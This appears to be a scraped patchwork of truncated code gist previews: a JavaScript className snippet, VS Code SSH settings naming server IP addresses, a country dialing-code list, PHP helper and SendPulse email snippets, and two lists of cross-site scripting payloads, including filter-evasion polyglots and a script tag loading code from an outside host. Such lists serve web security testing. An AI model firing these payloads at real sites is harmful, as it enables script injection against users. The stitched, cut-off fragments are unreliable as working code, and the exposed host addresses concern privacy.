From: StackOverflow
document.getElementById("MyElement").className = "MyClass";
document.getElementById("MyElement").className += " MyClass";
| { | |
| "editor.suggestSelection": "first", | |
| "remote.SSH.remotePlatform": { | |
| "165.227.100.91": "linux", | |
| "192.168.15.18": "linux", | |
| "seminovos-kentaro": "linux", | |
| "142.93.108.210": "linux", | |
| "servidor-home": "linux", | |
| "sotreq-novosite-rails": "linux", | |
| "sotreq-novosite-vue": "linux", |
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
| [{"country":"Afghanistan","code":"93","iso":"AF"}, | |
| {"country":"Albania","code":"355","iso":"AL"}, | |
| {"country":"Algeria","code":"213","iso":"DZ"}, | |
| {"country":"American Samoa","code":"1-684","iso":"AS"}, | |
| {"country":"Andorra","code":"376","iso":"AD"}, | |
| {"country":"Angola","code":"244","iso":"AO"}, | |
| {"country":"Anguilla","code":"1-264","iso":"AI"}, | |
| {"country":"Antarctica","code":"672","iso":"AQ"}, | |
| {"country":"Antigua and Barbuda","code":"1-268","iso":"AG"}, | |
| {"country":"Argentina","code":"54","iso":"AR"}, |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| <?php | |
| // Converts a number into a short version, eg: 1000 -> 1k | |
| // Based on: http://stackoverflow.com/a/4371114 | |
| function number_format_short( $n, $precision = 1 ) { | |
| if ($n < 900) { | |
| // 0 - 900 | |
| $n_format = number_format($n, $precision); | |
| $suffix = ''; | |
| } else if ($n < 900000) { |
| <?php | |
| // SendPulse's PHP Library: https://github.com/sendpulse/sendpulse-rest-api-php | |
| require_once( 'api/sendpulseInterface.php' ); | |
| require_once( 'api/sendpulse.php' ); | |
| $SPApiProxy = new SendpulseApi( API_USER_ID, API_SECRET, 'file' ); | |
| $email = array( | |
| 'html' => 'Your email content goes here', | |
| 'text' => 'Your email text version goes here', | |
| 'subject' => 'Testing SendPulse API', |
From: StackOverflow
document.getElementById("MyElement").className = "MyClass";
document.getElementById("MyElement").className += " MyClass";